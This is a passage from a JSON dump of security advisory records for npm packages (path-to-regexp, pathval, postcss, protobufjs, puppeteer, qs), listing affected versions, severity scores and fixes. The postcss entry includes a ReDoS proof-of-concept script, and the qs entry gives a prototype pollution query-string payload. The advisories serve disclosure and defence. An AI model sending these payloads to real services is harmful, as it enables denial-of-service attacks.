"https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f" }, { "type": "WEB", "url": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6" }, { "type": "WEB", "url": "https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485" }, { "type": "WEB", "url": "https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef" }, { "type": "WEB", "url": "https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894" }, { "type": "PACKAGE", "url": "https://github.com/pillarjs/path-to-regexp" }, { "type": "WEB", "url": "https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250124-0001" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2024-09-09T20:19:15Z", "nvd_published_at": "2024-09-09T19:15:13Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rhx6-c78j-4q9w", "published": "2024-12-05T22:40:47Z", "modified": "2025-06-03T14:30:56Z", "aliases": [ "CVE-2024-52798" ], "related": [ "CGA-3q69-c424-w54c", "CGA-46v3-9cq9-rx8v", "CGA-677r-6f8m-hg48", "CGA-6j8p-6x42-wj9m", "CGA-h864-qfx6-rqww", "CGA-wwx6-ggqg-hrxj" ], "summary": "path-to-regexp contains a ReDoS", "details": "### Impact\n\nThe regular expression that is vulnerable to backtracking can be generated in versions before 0.1.12 of `path-to-regexp`, originally reported in CVE-2024-45296\n\n### Patches\n\nUpgrade to 0.1.12.\n\n### Workarounds\n\nAvoid using two parameters within a single path segment, when the separator is not `.` (e.g. no `/:a-:b`). Alternatively, you can define the regex used for both parameters and ensure they do not overlap to allow backtracking.\n\n### References\n\n- https://github.com/advisories/GHSA-9wv6-86v2-598j\n- https://blakeembrey.com/posts/2024-09-web-redos/", "affected": [ { "package": { "name": "path-to-regexp", "ecosystem": "npm", "purl": "pkg:npm/path-to-regexp" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.1.12" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-rhx6-c78j-4q9w/GHSA-rhx6-c78j-4q9w.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-rhx6-c78j-4q9w" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52798" }, { "type": "WEB", "url": "https://github.com/pillarjs/path-to-regexp/commit/f01c26a013b1889f0c217c643964513acf17f6a4" }, { "type": "WEB", "url": "https://blakeembrey.com/posts/2024-09-web-redos" }, { "type": "PACKAGE", "url": "https://github.com/pillarjs/path-to-regexp" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250124-0002" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2024-12-05T22:40:47Z", "nvd_published_at": "2024-12-05T23:15:06Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g6ww-v8xp-vmwg", "published": "2022-02-10T20:21:24Z", "modified": "2025-01-14T08:57:34.966922Z", "aliases": [ "CVE-2020-7751" ], "summary": "Prototype pollution in pathval", "details": "A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.", "affected": [ { "package": { "name": "pathval", "ecosystem": "npm", "purl": "pkg:npm/pathval" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-g6ww-v8xp-vmwg/GHSA-g6ww-v8xp-vmwg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7751" }, { "type": "WEB", "url": "https://github.com/chaijs/pathval/pull/58/commits/21a9046cfa0c2697cb41990f3b4316db410e6c8a" }, { "type": "WEB", "url": "https://github.com/chaijs/pathval/pull/58/files" }, { "type": "PACKAGE", "url": "https://github.com/chaijs/pathval" }, { "type": "WEB", "url": "https://github.com/chaijs/pathval/releases/tag/v1.1.1" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-PATHVAL-596926" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2021-04-20T17:32:20Z", "nvd_published_at": "2020-10-26T12:17:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-566m-qj78-rww5", "published": "2022-01-07T00:21:36Z", "modified": "2025-01-14T08:57:01.148991Z", "aliases": [ "CVE-2021-23382" ], "summary": "Regular Expression Denial of Service in postcss", "details": "The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern \n```regex\n\\/\\*\\s* sourceMappingURL=(.*)\n```\n\n### PoC\n```js\nvar postcss = require(\"postcss\")\nfunction build_attack(n) {\n var ret = \"a{}\"\n for (var i = 0; i \u003c n; i++) {\n ret += \"/*# sourceMappingURL=\"\n }\n return ret + \"!\";\n}\n```\n```js\npostcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i \u003c= 500000; i++) {\n if (i % 1000 == 0) {\n var time = Date.now();\n var attack_str = build_attack(i) try {\n postcss.parse(attack_str) var time_cost = Date.now() - time;\n console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost + \" ms\");\n } catch (e) {\n var time_cost = Date.now() - time;\n console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost + \" ms\");\n }\n }\n}\n```", "affected": [ { "package": { "name": "postcss", "ecosystem": "npm", "purl": "pkg:npm/postcss" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.2.13" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-566m-qj78-rww5/GHSA-566m-qj78-rww5.json" } }, { "package": { "name": "postcss", "ecosystem": "npm", "purl": "pkg:npm/postcss" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "7.0.36" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-566m-qj78-rww5/GHSA-566m-qj78-rww5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23382" }, { "type": "WEB", "url": "https://github.com/postcss/postcss/commit/2b1d04c867995e55124e0a165b7c6622c1735956" }, { "type": "WEB", "url": "https://github.com/postcss/postcss/releases/tag/7.0.36" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1255641" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-POSTCSS-1255640" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-05-20T21:23:19Z", "nvd_published_at": "2021-04-26T16:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7fh5-64p2-3v2j", "published": "2023-09-30T00:31:10Z", "modified": "2025-11-04T16:45:01Z", "aliases": [ "CVE-2023-44270" ], "summary": "PostCSS line return parsing error", "details": "An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be `\\r` discrepancies, as demonstrated by `@font-face{ font:(\\r/*);}` in a rule.\n\nThis vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.", "affected": [ { "package": { "name": "postcss", "ecosystem": "npm", "purl": "pkg:npm/postcss" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "8.4.31" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-7fh5-64p2-3v2j/GHSA-7fh5-64p2-3v2j.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44270" }, { "type": "WEB", "url": "https://github.com/github/advisory-database/issues/2820" }, { "type": "WEB", "url": "https://github.com/postcss/postcss/commit/58cc860b4c1707510c9cd1bc1fa30b423a9ad6c5" }, { "type": "PACKAGE", "url": "https://github.com/postcss/postcss" }, { "type": "WEB", "url": "https://github.com/postcss/postcss/blob/main/lib/tokenize.js#L25" }, { "type": "WEB", "url": "https://github.com/postcss/postcss/releases/tag/8.4.31" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/12/msg00025.html" } ], "database_specific": { "cwe_ids": [ "CWE-144", "CWE-74" ], "github_reviewed": true, "github_reviewed_at": "2023-10-03T15:04:58Z", "nvd_published_at": "2023-09-29T22:15:11Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hwj9-h5mp-3pm3", "published": "2021-05-10T15:29:24Z", "modified": "2025-01-14T08:57:30.487716Z", "aliases": [ "CVE-2021-23368" ], "summary": "Regular Expression Denial of Service in postcss", "details": "The npm package `postcss` from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.", "affected": [ { "package": { "name": "postcss", "ecosystem": "npm", "purl": "pkg:npm/postcss" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.36" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-hwj9-h5mp-3pm3/GHSA-hwj9-h5mp-3pm3.json" } }, { "package": { "name": "postcss", "ecosystem": "npm", "purl": "pkg:npm/postcss" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.2.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-hwj9-h5mp-3pm3/GHSA-hwj9-h5mp-3pm3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23368" }, { "type": "WEB", "url": "https://github.com/postcss/postcss/commit/54cbf3c4847eb0fb1501b9d2337465439e849734" }, { "type": "WEB", "url": "https://github.com/postcss/postcss/commit/8682b1e4e328432ba692bed52326e84439cec9e4" }, { "type": "WEB", "url": "https://github.com/postcss/postcss/commit/b6f3e4d5a8d7504d553267f80384373af3a3dec5" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r00158f5d770d75d0655c5eef1bdbc6150531606c8f8bcb778f0627be@%3Cdev.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r16e295b4f02d81b79981237d602cb0b9e59709bafaa73ac98be7cef1@%3Cdev.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r49afb49b38748897211b1f89c3a64dc27f9049474322b05715695aab@%3Cdev.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5acd89f3827ad9a9cad6d24ed93e377f7114867cd98cfba616c6e013@%3Ccommits.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8def971a66cf3e375178fbee752e1b04a812a047cc478ad292007e33@%3Cdev.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad5af2044afb51668b1008b389ac815a28ecea9eb75ae2cab5a00ebb@%3Ccommits.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1244795" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-POSTCSS-1090595" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-05-07T17:26:38Z", "nvd_published_at": "2021-04-12T14:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-762f-c2wg-m8c8", "published": "2018-10-09T00:27:15Z", "modified": "2023-11-08T04:00:18.161439Z", "aliases": [ "CVE-2018-3738" ], "summary": "Denial of Service in protobufjs", "details": "Versions of `protobufjs` before 5.0.3 and 6.8.6 are vulnerable to a regular expression denial of service when parsing crafted invalid *.proto files.\n\n\n## Recommendation\n\nUpdate to version 5.0.3, 6.8.6 or later.", "affected": [ { "package": { "name": "protobufjs", "ecosystem": "npm", "purl": "pkg:npm/protobufjs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.8.6" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-762f-c2wg-m8c8/GHSA-762f-c2wg-m8c8.json" } }, { "package": { "name": "protobufjs", "ecosystem": "npm", "purl": "pkg:npm/protobufjs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.0.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-762f-c2wg-m8c8/GHSA-762f-c2wg-m8c8.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-3738" }, { "type": "WEB", "url": "https://hackerone.com/reports/319576" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-762f-c2wg-m8c8" }, { "type": "WEB", "url": "https://github.com/dcodeIO/protobuf.js/blob/6.8.5/src/parse.js#L27" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/605" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:21:32Z", "nvd_published_at": "2018-06-07T02:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g954-5hwp-pp24", "published": "2022-05-28T00:00:20Z", "modified": "2025-01-14T10:57:13.409784Z", "aliases": [ "CVE-2022-25878" ], "summary": "Prototype Pollution in protobufjs", "details": "The package protobufjs is vulnerable to Prototype Pollution, which can allow an attacker to add/modify properties of the Object.prototype. Versions after and including 6.10.0 until 6.10.3 and after and including 6.11.0 until 6.11.3 are vulnerable.\n\nThis vulnerability can occur in multiple ways:\n1. by providing untrusted user input to util.setProperty or to ReflectionObject.setParsedOption functions\n2. by parsing/loading .proto files\n\n\n", "affected": [ { "package": { "name": "protobufjs", "ecosystem": "npm", "purl": "pkg:npm/protobufjs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.11.0" }, { "fixed": "6.11.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-g954-5hwp-pp24/GHSA-g954-5hwp-pp24.json" } }, { "package": { "name": "protobufjs", "ecosystem": "npm", "purl": "pkg:npm/protobufjs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.10.0" }, { "fixed": "6.10.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-g954-5hwp-pp24/GHSA-g954-5hwp-pp24.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25878" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/pull/1731" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/pull/1735" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/commit/b5f1391dff5515894830a6570e6d73f5511b2e8f" }, { "type": "PACKAGE", "url": "https://github.com/protobufjs/protobuf.js" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/blob/d13d5d5688052e366aa2e9169f50dfca376b32cf/src/util.js%23L176-L197" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2841507" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-PROTOBUFJS-2441248" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2022-06-02T20:36:05Z", "nvd_published_at": "2022-05-27T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h755-8qp9-cq85", "published": "2023-07-05T15:30:24Z", "modified": "2024-06-28T18:31:41Z", "aliases": [ "CVE-2023-36665" ], "related": [ "CGA-9c79-2q9x-78w6" ], "summary": "protobufjs Prototype Pollution vulnerability", "details": "protobuf.js (aka protobufjs) 6.10.0 until 6.11.4 and 7.0.0 until 7.2.4 allows Prototype Pollution, a different vulnerability than CVE-2022-25878. A user-controlled protobuf message can be used by an attacker to pollute the prototype of Object.prototype by adding and overwriting its data and functions. Exploitation can involve: (1) using the function parse to parse protobuf messages on the fly, (2) loading .proto files by using load/loadSync functions, or (3) providing untrusted input to the functions ReflectionObject.setParsedOption and util.setProperty. NOTE: this CVE Record is about `Object.constructor.prototype.\u003cnew-property\u003e = ...;` whereas CVE-2022-25878 was about `Object.__proto__.\u003cnew-property\u003e = ...;` instead.", "affected": [ { "package": { "name": "protobufjs", "ecosystem": "npm", "purl": "pkg:npm/protobufjs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.2.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-h755-8qp9-cq85/GHSA-h755-8qp9-cq85.json" } }, { "package": { "name": "protobufjs", "ecosystem": "npm", "purl": "pkg:npm/protobufjs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.10.0" }, { "fixed": "6.11.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-h755-8qp9-cq85/GHSA-h755-8qp9-cq85.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36665" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/issues/1918#issuecomment-1723500294" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/pull/1899" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/commit/e66379f451b0393c27d87b37fa7d271619e16b0d" }, { "type": "PACKAGE", "url": "https://github.com/protobufjs/protobuf.js" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/commits/release-6.11.4" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/compare/protobufjs-v7.2.3...protobufjs-v7.2.4" }, { "type": "WEB", "url": "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.2.4" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240628-0006" }, { "type": "WEB", "url": "https://www.code-intelligence.com/blog/cve-protobufjs-prototype-pollution-cve-2023-36665" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2023-07-07T20:19:02Z", "nvd_published_at": "2023-07-05T14:15:09Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c2gp-86p4-5935", "published": "2020-09-02T18:25:43Z", "modified": "2023-11-08T04:01:37.201603Z", "aliases": [ "CVE-2019-5786" ], "summary": "Use-After-Free in puppeteer", "details": "Versions of `puppeteer` prior to 1.13.0 are vulnerable to the Use-After-Free vulnerability in Chromium (CVE-2019-5786). The Chromium FileReader API is vulnerable to Use-After-Free which may lead to Remote Code Execution.\n\n\n## Recommendation\n\nUpgrade to version 1.13.0 or later.", "affected": [ { "package": { "name": "puppeteer", "ecosystem": "npm", "purl": "pkg:npm/puppeteer" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.13.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-c2gp-86p4-5935/GHSA-c2gp-86p4-5935.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-5786" }, { "type": "WEB", "url": "https://github.com/GoogleChrome/puppeteer/issues/4141" }, { "type": "WEB", "url": "https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation" }, { "type": "WEB", "url": "https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html" }, { "type": "WEB", "url": "https://crbug.com/936448" }, { "type": "PACKAGE", "url": "https://github.com/GoogleChrome/puppeteer" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-PUPPETEER-174321" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/824" } ], "database_specific": { "cwe_ids": [ "CWE-416" ], "github_reviewed": true, "github_reviewed_at": "2020-08-31T18:37:09Z", "nvd_published_at": "2019-06-27T17:15:13Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f9cm-p3w6-xvr3", "published": "2018-10-09T00:38:48Z", "modified": "2023-11-08T03:57:33.533771Z", "aliases": [ "CVE-2014-10064" ], "summary": "Denial-of-Service Extended Event Loop Blocking in qs", "details": "Versions prior to 1.0.0 of `qs` are affected by a denial of service vulnerability that results from excessive recursion in parsing a deeply nested JSON string.\n\n\n\n\n## Recommendation\n\nUpdate to version 1.0.0 or later", "affected": [ { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-f9cm-p3w6-xvr3/GHSA-f9cm-p3w6-xvr3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-10064" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-f9cm-p3w6-xvr3" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/28" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:34:11Z", "nvd_published_at": null, "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-gqgv-6jq5-jjj9", "published": "2020-04-30T17:16:47Z", "modified": "2023-11-08T03:58:42.086259Z", "aliases": [ "CVE-2017-1000048" ], "summary": "Prototype Pollution Protection Bypass in qs", "details": "Affected version of `qs` are vulnerable to Prototype Pollution because it is possible to bypass the protection. The `qs.parse` function fails to properly prevent an object's prototype to be altered when parsing arbitrary input. Input containing `[` or `]` may bypass the prototype pollution protection and alter the Object prototype. This allows attackers to override properties that will exist in all objects, which may lead to Denial of Service or Remote Code Execution in specific circumstances.\n\n\n## Recommendation\n\nUpgrade to 6.0.4, 6.1.2, 6.2.3, 6.3.2 or later.", "affected": [ { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "6.0.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gqgv-6jq5-jjj9/GHSA-gqgv-6jq5-jjj9.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.1.0" }, { "fixed": "6.1.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gqgv-6jq5-jjj9/GHSA-gqgv-6jq5-jjj9.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.2.0" }, { "fixed": "6.2.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gqgv-6jq5-jjj9/GHSA-gqgv-6jq5-jjj9.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.3.0" }, { "fixed": "6.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gqgv-6jq5-jjj9/GHSA-gqgv-6jq5-jjj9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000048" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/issues/200" }, { "type": "WEB", "url": "https://github.com/ljharb/qs/commit/beade029171b8cef9cee0d03ebe577e2dd84976d" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2672" }, { "type": "PACKAGE", "url": "https://github.com/ljharb/qs" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:qs:20170213" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1469" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2020-04-30T17:16:10Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hrpp-h998-j3pp", "published": "2022-11-27T00:30:50Z", "modified": "2025-04-29T15:41:43Z", "aliases": [ "CVE-2022-24999" ], "summary": "qs vulnerable to Prototype Pollution", "details": "qs before 6.10.3 allows attackers to cause a Node process hang because an `__ proto__` key can be used. In many typical web framework use cases, an unauthenticated remote attacker can place the attack payload in the query string of the URL that is used to visit the application, such as `a[__proto__]=b\u0026a[__proto__]\u0026a[length]=100000000`. The fix was backported to qs 6.9.7, 6.8.3, 6.7.3, 6.6.1, 6.5.3, 6.4.1, 6.3.3, and 6.2.4.", "affected": [ { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.10.0" }, { "fixed": "6.10.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.9.0" }, { "fixed": "6.9.7" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.8.0" }, { "fixed": "6.8.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.7.0" }, { "fixed": "6.7.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.6.0" }, { "fixed": "6.6.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-hrpp-h998-j3pp/GHSA-hrpp-h998-j3pp.json" } }, { "package": { "name": "qs", "ecosystem": "npm", "purl": "pkg:npm/qs" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.5.0" }, { "fixed": 